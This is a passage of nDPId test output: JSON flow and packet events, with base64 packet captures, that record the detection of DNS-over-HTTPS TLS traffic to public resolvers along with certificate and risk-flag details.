36SeHQOxctDFxw00aD7\/ZIjnA7m+97J5Qh0XWgw5Lpsc8Mvp+VBxyMQklBuDFOyN3HJKbg943DoSjIMucZn1tzh8KOxw0Xql8+gP0Tj\/ncw8jVi\/PzuMVXmWMiQX\/wdJfEzJkJUlcXDAAE2IesO7KR0oZhnwcsaVEwrsJruOKxYtv2pbkmhOIxpFm4wJGmE+2JRFXkQDnRtvWvAJoF\/v0k69TDViO86TF2AjLFejfwjQQnCJXVkS4fuCh3i1TYrS+lUkfVezPrjjWW3F2LEdQQXJZmRfoBHSJjBhCP+Dcoc3jONSa9PXKqNJSf7Vo6MbkHB0XBcD7sdIZ2\/wIgxkllAd1uSaGBwJI8\/jhtA8RENMPWOxsz00xpbl8rHi+OkSD\/7Q58nbh7qhfzlemdSmsTNYU4yTeEr2yQTmNZcolwert2uPuF9VK2g\/3nveH2piPFCpAJOd4Z5dmxFR4fRYAGlILa5aNYiyWSR3G947wAwiYaU7l0JrzUlByQFpex9hGDkjjcctCUn8127O6yoOswVES887ts\/gfsXkn4d0JROgJbDiWFnN7j7+sZKWDkghhJYjTBSDkBNASiM9XLxgQ\/DaEwEwxYA7HjPEO\/8BxDusP8aK8hEqBPa8c8eFHdAYT3Eu2hChRagjV1O7Z0Zuc1z25GaMGiFKl7kwOrHIqt7609HLDEc8DgoFPHHr7IZJAecPMzvqj2CVzFTWl+NcGQgu1OZDB7YN8IsYE0Hj2wxjJJ4M8ncKFSWkLxvPRwAg+0hpC\/tSOqvX1jgKKAZg82Jl+tqVLBoZ773\/7qHfr\/BAX6oJ0vKtNpEDEGeMy6jjr8KxmYOPhgJuUsXOSiQKReqTW0HLQJn9LpGUn4zKUgOBpUtJCVQOwstz8rJvV98lhrypc92o1bXoXeUIxGojGdQmZAgxriin+ux8aVQDWCuRuunDdKlwCqYBaBQ5f2rPbpDMmRJRFIQV93Nffpu5y2M2nD2zqfxShtHtZqK9Odguom6eKtfMYRNoP0\/G2utDI3qzWXA4Mjnq20qW6WLp3\/OACxfwxJs+mIIux4CN4Of382BKD+HUg6iVDD+mi+PZO8yXcm+iMHr94FuVjknbJgwr8pz8hnl6BJO7Py9BRIAZSwIskF6wOgI\/\/4Qr2JcZ3TwaII9SEN+0Sx8PMXXAKDv89DA4GNqNhV0hw6VXwyvbxpg4tI+badMBjtd\/o4XHqPH+BgFz6M8EMB4Jddticq89uWfyyGOVmNlx8K6oUYEdD6RJBEwIP6yYPzzeebCbDK3en7B16cFcus7h8285+5Wxpsa9ruV64Q9ZoEhEUMGgffnT5ajZ+UpmS77fDl+DfNEzJY8TjXm9EL8XAwMBGQ9SGwhaT+0AWTV1WADn36NruqoDTHdQXMB5KJVX+hyENZfYkPjY19bk0TmuSlxnW4sPXtcFmHvEzv8TYCgHXXFqdgaXEgdtFhRRSPS0CqywSlTwtg9zlqkP6Vu\/gi2jnM2lX\/S3paNkHLJK2Xs42G6p+yMmyRBfn14DEFDykxvC8z+scW1WMMiVZcbQBKhJ+Ek8WtRoS9WYaJ74jobV62XFVLje4Al6wOy0PssyggYMNCsvtsxQ5KXxmsj4du7sF6hIaLMWOz7O8LamYiEYnY4YByhzDbINOM3XB385ribm3TlBE2FwQhpCNmgQNjG7wIBC9IfEBLxv5rxwvF8PVckgsWpRxADmo+gltAb0\/tgSzKl\/30lZxZ8BFwMDADWhE8bE7ktzdpeT1iEQv9HPHLrjBcBDs9EHJnB16E0omVuS5qQqwxUOOBNAVfkBff92\/dyz\/Q=="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310588,"flow_last_seen":946739310588,"flow_idle_time":7560000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739310588,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":946739310588,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":946739310588,"pkt":"REREREREZmZmZmZmCABFAAFGz7FAAL0GqFMKAAABp3LcfZKaAcWpCIgSh0x2XlAYAfZF5QAAFgMBARkBAAEVAwNM+6CQ4xrTV+1tOPP7h0Gj90S89M7DOPc8QQnDuq\/mRiD0eC9rhNsSjRzwJJQFthL\/q1ufnITsbP94aSBdrdhzDwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACmAAAAFQATAAAQZG5zMS5kbnNjcnlwdC5jYQAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACDUjoSgwC\/YwRC2sL4\/9W3ATSzLtM\/v84EfifaAhQZfWw=="} +01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310588,"flow_last_seen":946739310588,"flow_idle_time":7560000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739310588,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns1.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":946739310697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":3154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3154,"pkt_l4_len":3120,"thread_ts_msec":946739310697,"pkt":"ZmZmZmZmRERERERECABFAAxEyD9AADMGLsinctx9CgAAAQHFkpqHTHZeqQiJMFAYAfVQ4wAAFgMDAHoCAAB2AwOMlhGBzZbQdgMB7SlRRNR6aAHyhH11lUBOX85ujHC26yD0eC9rhNsSjRzwJJQFthL\/q1ufnITsbP94aSBdrdhzDxMBAAAuACsAAgMEADMAJAAdACBUUq246Yl+EWhWLEvZvcutMb+IirYuhEzXmLk3lr59QxQDAwABARcDAwAgZrqPXWP2zV85oWOqSEKZV0DzXUfiOwwJJ+C5CgZ1QqEXAwMKFVw16EKwmaYl6UqgM5FDRFEvQkVVdsBwborgCOxUvP2YbrJsHBMovDHHpAcBFTWebPQJMSKasadU094aHDRpLPrxxCjXB2pxM0WIqTvteHWIfU1Fk5\/NpqSuHKzO0Ra3PwdESYixe\/zb6sDdKKc1TRT99VsGnFNvwT\/9kRj6LGAVtWhnVsCfJH598qgWQ0wNsN5\/qg97535WjDSAoptbAHelOwuJgc8mZW87Z778lSdbGSJVYmbS+Kzpu3czloyo+k8tnMR0gAcl1hEQQ49kVF90oJqhnl11GE\/B0nhnrDcMC484Ni2gzPflOc2ve4l75Bv19quG6UuBjAJ+lAILT2sCAli3NgfXnu\/RIxYWHOwg5dkUsitPEbeddf7oCeQEhHZOIe8IWZHCTWJ8Xas6gq1DtDEctxSwxYTmBOPQYJURvi5XAJunxgkYorZ1S5H22PsJbPQoDTXE7jb\/MK+t+sJi\/qLBk\/QTcK+QjjpfOnPOG6kcTfb96PDiNmimFlhI+7qPbHOuBFKP3RlOfNCtE0LR80aRulQJ7mOKrhCqpMkFgCoXo\/4IvZulEfNa6rLjjxU0mGwRO9C\/8SUW\/MWxf9V+fhaFIFLLIrdk9mjlOAh4RTjBuIhZwdSm01OHFabvxJQc5nWUTI8sDv\/4Hth4Nmyyi395Zo\/bIgvPNsPA6YqSbJJPw7TRXj9EpeXABU58rfRMlnEHMcHSeAnr61+lHN29cf2rb7cQuEObxOV+r0Ti2hnTxG1kzZXxUKMf1TJz\/QNCPdFs\/8sc7I75BLceNNdyiMxbhvl0\/mQYkbbTX+E01I4nneSr0YAWi\/dj5OFWkY5oKdT3ijaj5ZnH8mUoUzF6gidtHrJfWLUutNNAVK0ii3hJTxAh53tLa55cziofBXUjER9OxqdXFQX0xk0dW5\/N25Am3sfN4K9G9Or+Mq0ZjCUN\/b\/4AAu5iVdc2xuiywbhKCKv\/+1ba649i2+11N2NuNP4WLerjRdmVgUEXTqjPsE1bvdPpgn\/tgD\/NfJO4snitGVo2fF0AIvoI8ffNDBM8mHNAe\/P4wCN21PuNzrXMiMwd7BKvHy1yaV3bx1ZcbZVsRq2ArQ\/sz1xvbYIM5K\/4uE3U5TUD7iEvNa+H0F0t5Pm3xl9hPFjB8UQZyCzE0eaHFxztuY1AhJrANiSpn9KUApux28hlfmPpxZwwY\/4voaTDNDh4a6l1L\/5bBlTMZQ8ZTPo3KsCc7rYoLRgUBfec4EVT3pXIcfZwnttUMEultj1OSOdAYKMUVl+Ae797PlHj+BPOvQU1JP+1NxmeW9EkPxvKNxTuFB8Ql03lSa0sP7N4iOT4LxwTyM6btUOuFjsDMq5fFh3z8x6u4eDmVvymYi2lDSt123i5VnAGlmqe2vlBnBoLSjRbpHHKNWC14LFSfaclke+Fsk\/LXqRdmrmwoK42FR8QM5yBJ4V4XBtfp1iJayJWXrv2Yp\/Jw2nGI\/8spJXweIKBfFJYNDE+FKqYVx6uY0QURwmsxmAiNbUSW3iE5ptj6f47Bqqzcu614k3woIktKLvq+R5kAUl\/94OeFfc1MDcYQiS1itHZ6WgYMqXlALhkIaagT341vLWH8EINXXu\/JPbuL4ratmRZsOHcAq4Z64Qth7VsN\/NAOgVmBZa9WLc6jmBs+\/7oNewv6pYbinaC9eFjw+AUviDZIoPDTI2cqHtCKNJKtQeYF8JwZdso+kGs0e4hY6Ekh+Gt4QIAdcddPMJiEMdHRRcI7TJwLsTmixFKIFFEmFMcRnAgRce970vQl6+J2m\/3\/zT76RlKTnb6S5cA2Gh1xVWfifqZ+dJJ4S6U8o2kzOx1BcO4lPr6QndhbLXBopt+TnAxhiNVC0jGSLxxKfJsKliuCmauybike5VfhMB74\/Zd9LI0lHZcyjtrJZpkqIdf9mUmq84TeFEVObpfDxeDp9pwfwnzY7CZiAhc8H7X\/B4eL6QPbJJeDvWRsaiMa8MtOGUovwBK\/1RmmRbBs9Ps\/WvCegAP2zZsifFoeWn3IFAPuF2t4F1jzP6KFB2fJjiCF\/xSMUdVX4mSSLxUy6Noq6HH8DTkiTT7i5Rtb6Z+6YPqTrIz0kRUJm8ymK8qGaWvXbafgJW+zAD6LQJ6Uz\/H9ede+fQeVaNdwR2ZGANN93T8+CUOO\/5QCgVylxvI+WkULYljrgmsAHGf2x4K+AdzUNCRbtqqamvoa9+H9TZ6D9K0XHtu60WRh\/xvg+0kvul3oISkBwW\/5VC47CJIkeqDKIcaH28dzjF68bVaWHBCOA\/QVspO8f7PM39uibr2ZI\/9qT7jw8Z+41laurnLDDiiTcv8nIyk9gPkkLpL0gZ8B7RwNepdi9poakmfyvLsu7noykkUZPrrciaDs4AxlMW2SE0l6ggoSXHblXDfGv1qrkJ+wYHqoIpx4Orz9BIDwmFuIK9uApDePCMMJ8COMRLP5+c7CWBbef3qNt43feI9i3DxrqohnnAeDQ5XayaaeIrWeswn\/yTkRhpCGBJsg0rlCy0bwelKJ5jOd0Z6yAeLdgeBTN7mANe1L7262l3N\/TUj4BGdpkUJSKWZ+F5L9xh3ZDx0CN7nut3setCOi4jALV8qZWBwNBsnPw\/1et9Mhz5yQU5W4hKDkIkR0JbpteXZI\/YulIUs304N95S0rMRs+F91Z\/I1bjxYITEBnA3nKgeOqnJG67UQeyBJy3Wot3ZWs1FnfHSinzEDRXoy\/in3NMk3Ee4UJjJJVvh1u1kB0flpae3nwu8yHniwAQeA4V\/IYlytwzxmH9UBxClJ1YaCH4QYvYTNNn4X5yrgDRFy8aRZbx7KFTZjETXMAwD7jXdzFpBRNyur7a5hxwjkpR1nPJHXNHbl9ulhBQraPk64O22lXmWhmTqqJxPCHLTJc8dCW9Tw+MWIDqlSC6iP\/uFGWMugMNTbPpm71YwCV6DE3MM5Iw3r\/pJtSMpVM1czkfmhYfe8YtiZEI64Bh59v3JQ7Geu6i4Q2THuBrvHiZucUzufDS6W\/DBGI9K4\/J9OjIx3bbp4KuEgDSz3alUQX8h9N3c6Ve\/ecJdJcy74VVi6oGyfaHP6IVk7S15X3oTFjfGBcG+hk0a0dR\/W0BGALH+pY8iH726JsGgeEg52jxxJyoyqN2BP+Onsb9VAjI4Axsa9MyFPMa6R4QE78VraMZsIMjQY2e6jOI2lFaIx1i29CS8IB7OY+l9i9GRSJhN1TC+qRidWiZdwiZ6CGxjzCAIjCNtYYMpt94CcLWARqfnvGVuwq7RqWOpW3L6qgDcGRhcwof3dXDPhz02YMhWNSauXVnUXZfqF8vmR+tgeJWIevQpdj5ioEIsT2Um5j+gijjHh859fJLDhzYVmYtQ3TEi737GfFw2SXnggL\/Iy07c7IZEI94AezYiyRdA9+kLWGaO\/dAL2rthXXz37bspZFnOGyuB0KI3G4RabCIXAwMBGcOMNM44BDplKj\/3Ojq4jdtuoD82NTa5b2k5zkFslQd12hFn3q5eB44nkwI465O8I9pSVocWpqU9EbYhTvyK1R8N4URD7Q5PMRg7Umy5tkS2hB9uZLmMl9DoKxlIW+kyr\/KuqeGrCAN583A5M1yhRuOwYF56CIKxvuyChPRKUAt8\/70gOTQjynH\/\/1nGoYgPF\/ta4eVsTLhuzDLb9mQMc16\/4VLa51E7HgIT9to4lg95nWvnMoIyp4a8sRcKKCYU92Ot4xWr0tqEIEu0fXIbk7\/Ta2loRt8FUwirJas4rlQGX1glaJy9RyPTHTwKV9kLdjGIRncOAxHu\/8Q7IfLg2aWJ07\/3naoyq6szJDQTcE3S8LB44P4jJ13NFwMDADUJ1y22teIy1dcIiwJwX4cS160nI55Nkh7bUzq2ftRXjrZxugVJnOhQTCokK54\/+GLzaYeqbw=="} +01090{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":74,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739310588,"flow_last_seen":946739310697,"flow_idle_time":7560000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3100,"flow_tot_l4_payload_len":3386,"flow_avg_l4_payload_len":1693,"midstream":1,"thread_ts_msec":946739310697,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns1.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":946739310700,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739310700,"pkt":"REREREREZmZmZmZmCABFAABoz7NAAL0GqS8KAAABp3LcfZKaAcWpCIkwh0yCelAYAfVFBwAAFAMDAAEBFwMDADWIup5ey1m73Olzdr+La\/pgBsOV2156nE0gjo7pkVZbX+HWq3wNBOBZgTPS2Gv4V1H1NoVl6Q=="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310980,"flow_last_seen":946739310980,"flow_idle_time":7560000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739310980,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00836{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":946739310980,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"thread_ts_msec":946739310980,"pkt":"REREREREZmZmZmZmCABFAAFBYCBAAL0GW60KAAABuSuHAZUqAburhCguMeSlTVAYAfYCHQAAFgMBARQBAAEQAwM7gJo4OG7S+iUgpLXTuxo5Xw1OBGj4DiyxVBvpcTjrrSC1ygzgmnU02BGfASVXjVBWPNfoJIqu28ODMXbR4UvXGQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAChAAAAEAAOAAALb2R2ci5uaWMuY3oABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg+HQ6d2TRAhXiPlV4SzYTTgVvyRFR0ttaRH8caXLPDAE="} +00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310980,"flow_last_seen":946739310980,"flow_idle_time":7560000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739310980,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"odvr.nic.cz","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":946739311016,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":3057,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3057,"pkt_l4_len":3023,"thread_ts_msec":946739311016,"pkt":"ZmZmZmZmRERERERECABFAAvj5XlAADUGU7K5K4cBCgAAAQG7lSox5KVNq4QpR1AYAO0MvwAAFgMDAGICAABeAwOYp2uqwk2kagwv1bFvuG7BP4gwxFJK\/HnbYlDDBgxtByBtkhDnIYlAH5FeNvmtcy43X+awJKk1khM1gLQ9O4\/1KcAvAAAW\/wEAAQAACwAEAwABAgAQAAUAAwJoMhYDAwn0CwAJ8AAJ7QAFUTCCBU0wggQ1oAMCAQICEgOvzNhD6HsqkMaua9kU943O+TANBgkqhkiG9w0BAQsFADBKMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5jcnlwdDEjMCEGA1UEAxMaTGV0J3MgRW5jcnlwdCBBdXRob3JpdHkgWDMwHhcNMjAwODAzMDY1MzUwWhcNMjAxMTAxMDY1MzUwWjAWMRQwEgYDVQQDEwtvZHZyLm5pYy5jejCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMSBtMaoOIrrVwbIP2cWYEJHSXjqgj\/\/9tkWX5PXpNopleDTdQVoDYtrhgWWdCxKvyghVnCCvqzpAdxH9iHJ+YDCJvMhSONvyUnQC+8wqGClBPGGgWuYJiWCNGWLq05jQxU5OjFamZYLeA83J41w0hXJ0caGVgR+ZmGHFjjdBCJABPqlSZbx4n\/8eqoqwv3W6903WKQrR8zszV5MtKKlTANB6QP2yhXI+UhhzdoeLxrEImAA6gxL2BOHWdKuBhBuV+ph8YRaL5IiMHVdXgcmxhPMtLDMaXcrlQWC6XO\/mVYjsQjycz9NHwfX9HBGmqdB8EpxpqAzOMv4Pfea+srqI+sCAwEAAaOCAl8wggJbMA4GA1UdDwEB\/wQEAwIFoDAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwDAYDVR0TAQH\/BAIwADAdBgNVHQ4EFgQUiF81uRjtpDLZWzD7gWIvMHk\/TcYwHwYDVR0jBBgwFoAUqEpqYwR93brm0Tm3pkVl7\/Oo7KEwbwYIKwYBBQUHAQEEYzBhMC4GCCsGAQUFBzABhiJodHRwOi8vb2NzcC5pbnQteDMubGV0c2VuY3J5cHQub3JnMC8GCCsGAQUFBzAChiNodHRwOi8vY2VydC5pbnQteDMubGV0c2VuY3J5cHQub3JnLzAWBgNVHREEDzANggtvZHZyLm5pYy5jejBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQMGCisGAQQB1nkCBAIEgfQEgfEA7wB2AF6nc\/nfVsDntTZIfdBJ4DJ6kZoMhKESEoQYdZaBcUVYAAABc7NP+yAAAAQDAEcwRQIhAKJu6NqRyIYQsDPHU\/A2REhgeKHjM4x+XnuUUYMuSVKBAiBvFXWETRjBcg4jaK4iYqlFL3MxxHaFAihU4M5Y1\/QWIQB1AAe3XBvlfWj\/8bDGHSMVx7rmV3xXlLdq7rxhOhpp06IcAAABc7NP+0kAAAQDAEYwRAIgbhSITSEVzSp\/pS3dsOxVrCnCOPr0QsQS\/Z8OeZ0VJL4CIEqFJZjRYER6kq4HNRyZ4yzxaPbu\/njrCFn4rfkG\/MO7MA0GCSqGSIb3DQEBCwUAA4IBAQCGEOIQRUNcWjsX719Aj278yDJZeRktrpYQiEzTApT2VFFAVk9RNpDtIgove0nygMmo0gYcRhVp8veJjqVoyBOpTj8fBZ0k4jHFaDhaRBi5aQXOMln+cU\/N+ZZyxOF\/OvhfMIgmGnNpnX15fmj0DD6pQOeMMvjd9\/6LhaAOIYehc8T\/qnYYgS+NN4PGwZ62L8NBcloKk78UBZkehMmgkPB4R4UGWU+P\/9wBXoct8xHeSEI\/RKypAvQONIxcx+PGOfY7cug8EawYjQxeC0dBrCPA4HuTbflrjLpxCEjs2nsPD4SXJGGl7AoG4paGMGZjt4DcZO2jhWz5unIehkjqEM\/fAASWMIIEkjCCA3qgAwIBAgIQCgFBQgAAAVOFc2oLheynCDANBgkqhkiG9w0BAQsFADA\/MSQwIgYDVQQKExtEaWdpdGFsIFNpZ25hdHVyZSBUcnVzdCBDby4xFzAVBgNVBAMTDkRTVCBSb290IENBIFgzMB4XDTE2MDMxNzE2NDA0NloXDTIxMDMxNzE2NDA0NlowSjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUxldCdzIEVuY3J5cHQxIzAhBgNVBAMTGkxldCdzIEVuY3J5cHQgQXV0aG9yaXR5IFgzMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnNMM8FrlLke3cl03g7NoYzDq1zUmGSXhvb418XCSL7e4S0EFq6meNQhY7LEqxGiHC6PjdeTm86dicbp5gWAf15Gan\/PQeGdxyGkOlZHP\/uaZ6WA8SMx+yk13EiSdRxta67nsHjcAHJyse6cF6s5K671B5TaYucv9bTyWaN8jKkKQDIZ0Z8h\/pZq4UmEUEz9l6YKHy9v6Dlb2honzhT+Xhq+w3Brvaw2VFn3EK6BlspkENnWAa6xK8xuQSXgvopZPKiAlKQTGdMDQMc2PMTiVFrqoM7hD8bEfwzB\/onkxEz0tNvjj\/PIzark5McWvxI0NHWQWM6r6hCm21AvA2H3DkwIDAQABo4IBfTCCAXkwEgYDVR0TAQH\/BAgwBgEB\/wIBADAOBgNVHQ8BAf8EBAMCAYYwfwYIKwYBBQUHAQEEczBxMDIGCCsGAQUFBzABhiZodHRwOi8vaXNyZy50cnVzdGlkLm9jc3AuaWRlbnRydXN0LmNvbTA7BggrBgEFBQcwAoYvaHR0cDovL2FwcHMuaWRlbnRydXN0LmNvbS9yb290cy9kc3Ryb290Y2F4My5wN2MwHwYDVR0jBBgwFoAUxKexpHsscfrb4UuQdf\/EFWCFiRAwVAYDVR0gBE0wSzAIBgZngQwBAgEwPwYLKwYBBAGC3xMBAQEwMDAuBggrBgEFBQcCARYiaHR0cDovL2Nwcy5yb290LXgxLmxldHNlbmNyeXB0Lm9yZzA8BgNVHR8ENTAzMDGgL6AthitodHRwOi8vY3JsLmlkZW50cnVzdC5jb20vRFNUUk9PVENBWDNDUkwuY3JsMB0GA1UdDgQWBBSoSmpjBH3duubRObemRWXv86jsoTANBgkqhkiG9w0BAQsFAAOCAQEA3TPXEfNjWDjdGBX7CVW+dla5cEilaUcne8IkCJLxWh9KEik3JHRRHGJouM2VcGfl96S8TihRzZvoroed6ti6WqEBmtzw3Wodatg+VyOeph4EYpr\/1wXKtx8\/wApIvJSwtmVi4MFU5aMqrSDE6ea73Mj2tcMyo5jMd6jmeWUHK8so\/joWUoHOUgwuX4Po1QYz+3dszkDqMp4fklxBwXRsW10KXzPMTZ+sOPAveyxindmjkW8lGy+QsRlGPfZ+G6Z6h7mjem0Y+iWlkYcV4PIWL1iwBi8saCbGS5jN2p8M+X+Q7UNKEkROb3N6KOqkqm57TH2H3eDJAkSnh6\/DNFu0QhYDAwFNDAABSQMAF0EE7OwduzycCFyh5foVYUYJfj2csLLoqbmNrs4ksDiqkMaHC2NulFxfST4jcCRZ19YEaLojL5JVRvlluRb8LA6yDQQBAQARbpzNdpCTfHNn9Bz14lNKRHZrsXa4X4EmfyVVEagU6WSCW5UKp3bMis8UAzosg4RFbcIE\/BqKgmQG64Bt\/cGitnxq47bonIC\/OFLylrM320R6R6uLkQuGNQpkUlgrZKL\/+YkYqd4ToLlZjenqQeguYlPWOUvDEduCfvOd+A9y2fcGuSyrbb0En99qwYiK1PUm11WXjEDQ91vzKm5Pz2wWWFYuywvRbHOtLetuqGEfMtz5QTTP+GA2fJf1SHhqAtT7v7XaP+5Wvee65IgIoNU6aiAVYz3hwW\/AkDmTqCcqZ608Q7A+R1MIFZgfnWqkxiaXPHcpFh\/8pcgjckhLtTiSFgMDAAQOAAAA"} +01283{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":92,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739310980,"flow_last_seen":946739311016,"flow_idle_time":7560000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":3003,"flow_tot_l4_payload_len":3284,"flow_avg_l4_payload_len":1642,"midstream":1,"thread_ts_msec":946739311016,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"odvr.nic.cz","server_names":"odvr.nic.cz","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=odvr.nic.cz","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"15:57:4E:06:5B:3D:23:22:EF:BC:2E:5B:A3:3E:A5:76:BD:14:01:4B"}} 